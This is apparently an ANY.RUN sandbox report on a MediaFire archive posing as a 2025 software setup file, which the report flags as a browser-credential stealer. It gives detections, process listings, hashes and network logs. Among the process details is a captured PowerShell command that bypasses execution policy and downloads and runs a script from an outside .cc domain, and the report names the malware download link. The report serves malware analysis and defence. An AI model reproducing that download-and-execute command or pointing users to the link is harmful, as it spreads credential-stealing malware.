URL:

https://www.mediafire.com/file/x6gotyr3wvbit1v/D0WN10AD_S𐌄ᴛUP_F1LE_(2025)_PAS5.zip/file

Full analysis: https://app.any.run/tasks/b71f65b9-7d4a-47c9-a6e2-8f343eafbedc
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: November 30, 2025, 06:08:10
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
doc-url
python
exploit
arch-exec
stealer
Indicators:
MD5:

BF0BC92774B43E45015A91974386F6F6

SHA1:

08DE0D2C90ECA04B8DCD9ED2AC7D5B81788C30A7

SHA256:

3120130A8360626122406DC38E45FAE22F433DCE10DAF0B2A6E8B138DDAEC120

SSDEEP:

3:N8DSLw3eGUo+Q1wXVjUy71c:2OLw3eGcFji

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • EMMENHTAL has been detected (YARA)

      • mshta.exe (PID: 8228)

    • Executing a file with an untrusted certificate

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Actions looks like stealing browser data

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Steals credentials from Web Browsers

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Changes powershell execution policy (Bypass)

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2976)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2976)

  • SUSPICIOUS

    • Application launched itself

      • WinRAR.exe (PID: 8268)
      • WinRAR.exe (PID: 8408)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 8268)
      • WinRAR.exe (PID: 8408)

    • Loads Python modules

      • Setup.exe (PID: 940)

    • Starts CMD.EXE for commands execution

      • Setup.exe (PID: 940)

    • Executed via WMI

      • curl.exe (PID: 8996)
      • WinX_DVD_Copy_Pro.exe (PID: 8352)
      • mshta.exe (PID: 7768)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 8228)

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 8480)

    • Process drops python dynamic module

      • WinRAR.exe (PID: 8480)

    • The process bypasses the loading of PowerShell profile settings

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Starts POWERSHELL.EXE for commands execution

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Probably download files using WebClient

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Possibly malicious use of IEX has been detected

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 2976)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2976)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 2976)

    • Executes as Windows Service

      • WmiApSrv.exe (PID: 1296)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 7380)

    • Reads the computer name

      • identity_helper.exe (PID: 7284)
      • curl.exe (PID: 8996)
      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 8408)

    • Checks supported languages

      • identity_helper.exe (PID: 7284)
      • curl.exe (PID: 8996)
      • Setup.exe (PID: 940)
      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 8480)

    • Launching a file from the Downloads directory

      • msedge.exe (PID: 7380)

    • The sample compiled with english language support

      • WinRAR.exe (PID: 8480)
      • curl.exe (PID: 8996)
      • mshta.exe (PID: 8228)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 8228)
      • mshta.exe (PID: 7768)

    • Checks proxy server information

      • mshta.exe (PID: 8228)
      • slui.exe (PID: 8568)
      • powershell.exe (PID: 2976)
      • mshta.exe (PID: 7768)

    • Python executable

      • Setup.exe (PID: 940)

    • Reads the machine GUID from the registry

      • WinX_DVD_Copy_Pro.exe (PID: 8352)

    • Disables trace logs

      • powershell.exe (PID: 2976)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 2976)

    • Reads Environment values

      • identity_helper.exe (PID: 7284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
204
Monitored processes
53
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe no specs winword.exe ai.exe no specs winrar.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs setup.exe no specs cmd.exe no specs conhost.exe no specs #EMMENHTAL mshta.exe curl.exe conhost.exe no specs msedge.exe no specs winx_dvd_copy_pro.exe msedge.exe no specs msedge.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe conhost.exe no specs wmiapsrv.exe no specs mshta.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
940"C:\Users\admin\Downloads\Setup.exe" C:\Users\admin\Downloads\Setup.exeexplorer.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.14.0
Modules
Images
c:\users\admin\downloads\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\downloads\vcruntime140.dll
c:\users\admin\downloads\python314.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
1296C:\WINDOWS\system32\wbem\WmiApSrv.exeC:\Windows\System32\wbem\WmiApSrv.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Performance Reverse Adapter
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmiapsrv.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\psapi.dll
1832"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --disable-quic --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=3600,i,1207702270419515090,7589410632645759634,262144 --variations-seed-version --mojo-platform-channel-handle=5144 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1832"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeWinX_DVD_Copy_Pro.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1924"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4916,i,1207702270419515090,7589410632645759634,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6208,i,1207702270419515090,7589410632645759634,262144 --variations-seed-version --mojo-platform-channel-handle=6396 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.92\identity_helper.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
PWA Identity Proxy Host
Exit code:
3221226029
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\identity_helper.exe
c:\windows\system32\ntdll.dll
2276C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2312"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --disable-quic --message-loop-type-ui --string-annotations --always-read-main-dll --field-trial-handle=6828,i,1207702270419515090,7589410632645759634,262144 --variations-seed-version --mojo-platform-channel-handle=7416 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2312"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.3636 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7768,i,1207702270419515090,7589410632645759634,262144 --variations-seed-version --mojo-platform-channel-handle=6844 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2976powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://globalsnn2-new.cc/styles.css')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
WinX_DVD_Copy_Pro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
26 525
Read events
26 192
Write events
309
Delete events
24

Modification events

(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Downloads\D0WN10AD_S𐌄ᴛUP_F1LE_(2025)_PAS5.zip
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Operation:writeName:Word.Document.12
Value:
(PID) Process:(8408) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000F4C52DC4BF61DC01
Executable files
58
Suspicious files
485
Text files
961
Unknown types
4

Dropped files

PID
Process
Filename
Type
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RF1620bb.TMP
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF1620cb.TMP
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF1620db.TMP
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old~RF1620db.TMP
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF1620db.TMP
MD5:
SHA256:
7380msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1620db.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
129
DNS requests
134
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7728
msedge.exe
GET
200
150.171.27.11:80
http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:NTr2whSkq5_VI_HnnF7FqHjZGRFVFDTwTxM9g14fYjk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
US
text
97 b
whitelisted
4916
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
5596
MoUsoCoreWorker.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
8808
WINWORD.EXE
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
US
binary
471 b
whitelisted
8252
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
US
binary
419 b
whitelisted
8252
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
US
binary
408 b
whitelisted
8252
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.3.crl
US
binary
813 b
whitelisted
8252
SIHClient.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
NL
binary
824 b
whitelisted
8252
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl
US
binary
814 b
whitelisted
8252
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl
US
binary
401 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4824
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
4916
svchost.exe
40.126.31.1:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5596
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7088
SearchApp.exe
2.16.241.218:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
7728
msedge.exe
150.171.27.11:80
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
7728
msedge.exe
150.171.22.17:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7728
msedge.exe
150.171.27.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7728
msedge.exe
104.17.148.83:443
www.mediafire.com
CLOUDFLARENET
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
login.live.com
  • 40.126.31.1
  • 40.126.31.131
  • 20.190.159.73
  • 40.126.31.128
  • 20.190.159.129
  • 40.126.31.0
  • 20.190.159.68
  • 20.190.159.2
whitelisted
google.com
  • 172.217.18.14
whitelisted
www.bing.com
  • 2.16.241.218
  • 2.16.241.201
  • 92.123.104.32
  • 92.123.104.33
  • 92.123.104.31
  • 92.123.104.34
  • 92.123.104.19
  • 92.123.104.67
  • 92.123.104.60
  • 92.123.104.61
  • 92.123.104.17
  • 92.123.104.49
  • 92.123.104.52
whitelisted
edge.microsoft.com
  • 150.171.27.11
  • 150.171.28.11
whitelisted
config.edge.skype.com
  • 150.171.22.17
whitelisted
www.mediafire.com
  • 104.17.148.83
  • 104.17.147.83
whitelisted
copilot.microsoft.com
  • 92.123.104.53
  • 92.123.104.45
whitelisted
www.googletagmanager.com
  • 142.250.186.168
whitelisted
translate.google.com
  • 142.250.186.46
whitelisted

Threats

PID
Process
Class
Message
7728
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
7728
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
7728
msedge.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
7728
msedge.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
7728
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
7728
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
7728
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2276
svchost.exe
Misc activity
INFO [ANY.RUN] .cc TLD domain request
Misc activity
ET INFO Observed UA-CPU Header
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://www.mediafire.com/file/x6gotyr3wvbit1v/D0WN10AD_S𐌄ᴛUP_F1LE_(2025)_PAS5.zip/file